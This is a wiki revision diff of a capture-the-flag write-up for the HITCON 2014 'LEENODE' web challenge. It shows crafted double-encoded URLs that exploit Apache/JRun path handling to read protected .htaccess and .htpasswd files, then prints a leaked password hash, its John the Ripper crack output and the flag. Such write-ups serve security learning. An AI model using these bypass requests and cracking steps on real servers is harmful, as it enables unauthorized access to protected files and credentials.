1587
コメント:
|
1587
|
削除された箇所はこのように表示されます。 | 追加された箇所はこのように表示されます。 |
行 12: | 行 12: |
1. Finally, I got the /admin/.htaccess via [[http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp]] and /admin/.htaccess via [[http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp]]. {{{ | 1. Finally, I got the /admin/.htaccess via [[http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp]] and /admin/.htpasswd via [[http://203.66.57.98/.%5Cadmin%5C.htpasswd%253b.jsp]]. {{{ |
LEENODE
- Perhaps, what we need to do is to access to /admin/
- The server was Apache/2.0.65 (Unix) JRun/4.0 Server.
- *.jsp was redirected to JRun server.
- I found a vulnerability information of JRun
http://203.66.57.98/a;.jsp was 500 Internal Server Error. It is interesting. by Apache?
I tried to escape the URL for Apache; http://203.66.57.98/a%253b.jsp was /a and 404 Error by JRun. It is very interesting.
Can I get /.htaccess or /admin/.htaccess? http://203.66.57.98/.htaccess%253b.jsp, http://203.66.57.98/admin/.htaccess%253b.jsp: Answer is no. These are blocked by Apache. We need more tricks.
Then, I found that JRun recognized backslash as directory separator (for Windows?). http://203.66.57.98/.%5Ca%253b.jsp was handled as /a by JRun.
Finally, I got the /admin/.htaccess via http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp and /admin/.htpasswd via http://203.66.57.98/.%5Cadmin%5C.htpasswd%253b.jsp.
AuthName "Restricted Area" AuthType Basic AuthUserFile /usr/local/apache2/htdocs/admin/.htpasswd AuthGroupFile /dev/null require valid-user
hitc0n_1een0de:nlGc3XNhkrL1o
Use John. The password was ktw2z.
% john htpasswd ktw2z (hitc0n_1een0de) guesses: 1 time: 0:00:01:13 DONE (Sat Aug 16 20:58:25 2014) c/s: 5319K trying: ktkcK - kk4iT
There was the flag on http://203.66.57.98/admin/thefl4g.txt.
The flag is HITCON{u_d0nt_f0rg3t_d0uble_3nc0ding!}